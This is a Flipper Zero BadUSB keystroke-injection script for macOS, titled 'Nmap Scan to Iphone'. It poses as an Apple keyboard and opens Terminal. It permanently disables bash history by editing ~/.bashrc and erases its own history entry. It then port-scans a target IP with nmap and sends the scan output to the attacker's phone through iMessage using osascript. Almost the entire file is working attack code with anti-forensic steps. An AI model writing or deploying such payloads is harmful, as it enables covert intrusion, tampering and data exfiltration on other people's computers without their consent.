flipper-zero-stuff/badusb/MacOS-narstybits/RECON/Nmap Scan to Iphone.txt
2024-08-14 08:38:30 -07:00

43 lines
1 KiB
Plaintext

REM This script does a Port scan using the targets I.P.
REM then it sends the information from the scan to your phone.
REM Shoutout to matthewkayne and 0iphor13 for the Phone code
REM Replace "TARGET_IP" with I.P. of Target Mac
REM Replace "Phone Number HERE" with your phone number to receive Network Information
REM Requirement: NMAP
REM can install using homebrew 'brew install nmap'
REM Title: Nmap Scan to Iphone
REM Author: NARSTY
REM Target: MacOS
REM Version: 1.0
REM Category: Recon
ID 05ac:021e Apple:Keyboard
DELAY 500
GUI SPACE
DELAY 500
STRING terminal
DELAY 1000
ENTER
DELAY 500
STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash
DELAY 500
ENTER
DELAY 500
STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }')
DELAY 500
ENTER
DELAY 500
ENTER
DELAY 500
STRING x=$(nmap -p 1-1000 -T4 -v TARGET_IP); osascript -e 'tell application "Messages" to send "'$x'" to buddy "Phone Number HERE"'
DELAY 500
ENTER
DELAY 500
ENTER
DELAY 2000
GUI W